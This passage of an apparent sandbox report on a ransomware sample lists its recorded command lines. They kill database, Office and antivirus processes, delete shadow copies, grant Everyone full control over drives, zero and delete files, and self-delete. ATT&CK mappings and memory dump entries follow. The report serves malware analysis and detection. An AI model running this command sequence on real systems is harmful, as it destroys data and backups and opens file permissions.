"net.exe" use \\10.10.0.18\B$
2⤵
PID:4556

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4352

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4304

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4316

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\C$
2⤵
PID:4548

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\I$
2⤵
PID:4692

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2368

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\X$
2⤵
PID:4308

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4680

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4132

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\D$
2⤵
PID:4152

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\J$
2⤵
PID:4228

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\Y$
2⤵
PID:4792

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4552

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4408

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4472

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\E$
2⤵
PID:3896

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\Z$
2⤵
PID:5088

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4728

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
2⤵
- Kills process with taskkill
PID:4652

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\K$
2⤵
PID:4012

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4904

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\F$
2⤵
PID:2184

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4280

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\L$
2⤵
PID:908

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM visio.exe /F
2⤵
- Kills process with taskkill
PID:4328

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1120

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\G$
2⤵
PID:4856

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\M$
2⤵
PID:356

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3168

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM winword.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4656

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5112

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\N$
2⤵
PID:4456

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\H$
2⤵
PID:3616

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1736

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
2⤵
- Kills process with taskkill
PID:4392

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3172

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\O$
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1092

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\I$
2⤵
PID:4140

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4344

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4640

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3712

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\P$
2⤵
PID:5060

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
2⤵
- Kills process with taskkill
PID:4412

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\J$
2⤵
PID:5024

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4308

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\Q$
2⤵
PID:4364

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\K$
2⤵
PID:3808

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4700

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1848

C:\Windows\SYSTEM32\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:4808

C:\Windows\SYSTEM32\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:4012

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\L$
2⤵
PID:1832

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\R$
2⤵
PID:4180

C:\Windows\SYSTEM32\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1256

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\S$
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2300

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\M$
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4328

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\N$
2⤵
PID:4480

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\T$
2⤵
PID:4916

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\O$
2⤵
PID:4340

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\U$
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4240

C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
2⤵
- Opens file in notepad (likely ransom note)
PID:4724

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
2⤵
PID:4872

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4456

C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
3⤵
- Runs ping.exe
PID:5096

C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
3⤵
PID:2544

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\P$
2⤵
PID:5028

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\V$
2⤵
PID:5044

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4236

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\Q$
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4392

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\W$
2⤵
PID:1160

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\R$
2⤵
PID:4348

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\X$
2⤵
PID:4796

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4428

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\S$
2⤵
PID:4388

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\Y$
2⤵
PID:4416

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\Z$
2⤵
PID:4432

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\T$
2⤵
PID:4940

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1836

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\U$
2⤵
PID:4512

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4412

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\V$
2⤵
PID:4868

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4320

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\W$
2⤵
PID:3412

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\net_shares.exe
2⤵
PID:4756

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:2664

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
1⤵
PID:3528

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
1⤵
PID:572

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4748

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4708

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4320

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4960

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:4824

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4436

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4792

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4652

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

File Permissions Modification

1

T1222

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/296-124-0x0000000000000000-mapping.dmp

Download
memory/416-122-0x0000000000000000-mapping.dmp

Download
memory/540-145-0x0000000000000000-mapping.dmp

Download
memory/572-140-0x0000000000000000-mapping.dmp

Download
memory/1224-129-0x0000000000000000-mapping.dmp

Download
memory/1248-128-0x0000000000000000-mapping.dmp

Download
memory/1252-136-0x0000000000000000-mapping.dmp

Download
memory/1328-144-0x0000000000000000-mapping.dmp

Download
memory/1348-132-0x0000000000000000-mapping.dmp

Download
memory/1524-139-0x0000000000000000-mapping.dmp

Download
memory/1564-125-0x0000000000000000-mapping.dmp

Download
memory/1836-143-0x0000000000000000-mapping.dmp

Download
memory/1848-185-0x0000023BBC820000-0x0000023BBC821000-memory.dmp

Filesize
4KB

Download
memory/1848-188-0x0000023BD4FE0000-0x0000023BD4FE1000-memory.dmp

Filesize
4KB

Download
memory/1848-189-0x0000023BD4E50000-0x0000023BD4E52000-memory.dmp

Filesize
8KB

Download
memory/1848-190-0x0000023BD4E53000-0x0000023BD4E55000-memory.dmp

Filesize
8KB

Download
memory/1848-202-0x0000023BD4E56000-0x0000023BD4E58000-memory.dmp

Filesize
8KB

Download
memory/2112-142-0x0000000000000000-mapping.dmp

Download
memory/2128-141-0x0000000000000000-mapping.dmp

Download
memory/2144-180-0x0000000000000000-mapping.dmp

Download
memory/2320-121-0x0000000000000000-mapping.dmp

Download
memory/2408-117-0x0000000000000000-mapping.dmp

Download
memory/2476-138-0x0000000000000000-mapping.dmp

Download
memory/2892-126-0x0000000000000000-mapping.dmp

Download
memory/2932-135-0x0000000000000000-mapping.dmp

Download
memory/2948-137-0x0000000000000000-mapping.dmp

Download
memory/2984-118-0x0000000000000000-mapping.dmp

Download
memory/3092-130-0x0000000000000000-mapping.dmp

Download
memory/3340-119-0x0000000000000000-mapping.dmp

Download
memory/3488-134-0x0000000000000000-mapping.dmp

Download
memory/3616-146-0x0000000000000000-mapping.dmp

Download
memory/3808-127-0x0000000000000000-mapping.dmp

Download
memory/3912-131-0x0000000000000000-mapping.dmp

Download
memory/3936-133-0x0000000000000000-mapping.dmp

Download
memory/3964-123-0x0000000000000000-mapping.dmp

Download
memory/3968-116-0x0000000000F00000-0x0000000000F02000-memory.dmp

Filesize
8KB

Download
memory/3968-114-0x00000000007A0000-0x00000000007A1000-memory.dmp

Filesize
4KB

Download
memory/3980-147-0x0000000000000000-mapping.dmp

Download
memory/4080-120-0x0000000000000000-mapping.dmp

Download
memory/4116-148-0x0000000000000000-mapping.dmp

Download
memory/4156-149-0x0000000000000000-mapping.dmp

Download
memory/4176-150-0x0000000000000000-mapping.dmp

Download
memory/4224-151-0x0000000000000000-mapping.dmp

Download
memory/4244-152-0x0000000000000000-mapping.dmp

Download
memory/4316-153-0x0000000000000000-mapping.dmp

Download
memory/4340-154-0x0000000000000000-mapping.dmp

Download
memory/4352-155-0x0000000000000000-mapping.dmp

Download
memory/4416-156-0x0000000000000000-mapping.dmp

Download
memory/4432-157-0x0000000000000000-mapping.dmp

Download
memory/4460-158-0x0000000000000000-mapping.dmp

Download
memory/4480-159-0x0000000000000000-mapping.dmp

Download
memory/4532-160-0x0000000000000000-mapping.dmp

Download
memory/4560-161-0x0000000000000000-mapping.dmp

Download
memory/4580-162-0x0000000000000000-mapping.dmp

Download
memory/4612-163-0x0000000000000000-mapping.dmp

Download
memory/4640-164-0x0000000000000000-mapping.dmp

Download
memory/4680-165-0x0000000000000000-mapping.dmp

Download
memory/4696-166-0x0000000000000000-mapping.dmp

Download
memory/4732-167-0x0000000000000000-mapping.dmp

Download
memory/4748-168-0x0000000000000000-mapping.dmp

Download
memory/4796-169-0x0000000000000000-mapping.dmp

Download
memory/4812-170-0x0000000000000000-mapping.dmp

Download
memory/4864-171-0x0000000000000000-mapping.dmp

Download
memory/4876-172-0x0000000000000000-mapping.dmp

Download
memory/4924-173-0x0000000000000000-mapping.dmp

Download
memory/4932-174-0x0000000000000000-mapping.dmp

Download
memory/4988-175-0x0000000000000000-mapping.dmp

Download
memory/5000-176-0x0000000000000000-mapping.dmp

Download
memory/5040-177-0x0000000000000000-mapping.dmp

Download
memory/5076-178-0x0000000000000000-mapping.dmp

Download
memory/5100-179-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads